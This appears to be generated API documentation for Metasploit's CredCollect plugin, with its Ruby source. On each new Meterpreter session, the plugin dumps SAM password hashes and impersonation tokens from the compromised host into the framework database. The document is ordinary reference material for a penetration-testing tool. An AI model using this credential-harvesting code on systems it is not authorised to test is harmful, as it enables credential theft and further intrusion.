Class: Msf::Plugin::CredCollect

Inherits:
Msf::Plugin show all
Includes:
SessionEvent
Defined in:
plugins/db_credcollect.rb

Defined Under Namespace

Classes: CredCollectCommandDispatcher

Instance Attribute Summary

Attributes inherited from Msf::Plugin

#opts

Attributes included from Framework::Offspring

#framework

Instance Method Summary collapse

Methods included from SessionEvent

#on_session_command, #on_session_download, #on_session_filedelete, #on_session_interact, #on_session_output, #on_session_upload

Methods inherited from Msf::Plugin

#add_console_dispatcher, create, #flush, #input, #output, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #remove_console_dispatcher

Constructor Details

#initialize(framework, opts) ⇒ CredCollect

Returns a new instance of CredCollect.



88
89
90
91
92
 
# File 'plugins/db_credcollect.rb', line 88

def initialize(framework, opts)
  super
  self.framework.events.add_session_subscriber(self)
  add_console_dispatcher(CredCollectCommandDispatcher)
end

Instance Method Details

#cleanupObject 



94
95
96
97
 
# File 'plugins/db_credcollect.rb', line 94

def cleanup
  framework.events.remove_session_subscriber(self)
  remove_console_dispatcher('credcollect')
end

#descObject 



103
104
105
 
# File 'plugins/db_credcollect.rb', line 103

def desc
  'Automatically grab hashes and tokens from Meterpreter session events and store them in the database'
end

#nameObject 



99
100
101
 
# File 'plugins/db_credcollect.rb', line 99

def name
  'db_credcollect'
end

#on_session_close(session, reason = '') ⇒ Object 



86
 
# File 'plugins/db_credcollect.rb', line 86

def on_session_close(session, reason = ''); end

#on_session_open(session) ⇒ Object 



35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
 
# File 'plugins/db_credcollect.rb', line 35

def on_session_open(session)
  return if !framework.db.active

  print_status('This is CredCollect, I have the conn!')

  if (session.type == 'meterpreter')

    # Make sure we're rockin Priv and Incognito
    session.core.use('priv')
    session.core.use('incognito')

    # It wasn't me mom! Stinko did it!
    hashes = session.priv.sam_hashes

    # Target infos for the db record
    addr = session.sock.peerhost
    # This ought to read from the exploit's datastore.
    # Use the meterpreter script if you need to control it.
    smb_port = 445

    # Record hashes to the running db instance
    hashes.each do |hash|
      data = {}
      data[:host] = addr
      data[:port] = smb_port
      data[:sname] = 'smb'
      data[:user] = hash.user_name
      data[:pass] = hash.lanman + ':' + hash.ntlm
      data[:type] = 'smb_hash'
      data[:active] = true

      framework.db.report_auth_info(data)
    end

    # Record user tokens
    tokens = session.incognito.incognito_list_tokens(0).values
    # Meh, tokens come to us as a formatted string
    tokens = tokens.join.strip!.split("\n")

    tokens.each do |token|
      data = {}
      data[:host] = addr
      data[:type] = 'smb_token'
      data[:data] = token
      data[:update] = :unique_data

      framework.db.report_note(data)
    end
  end
end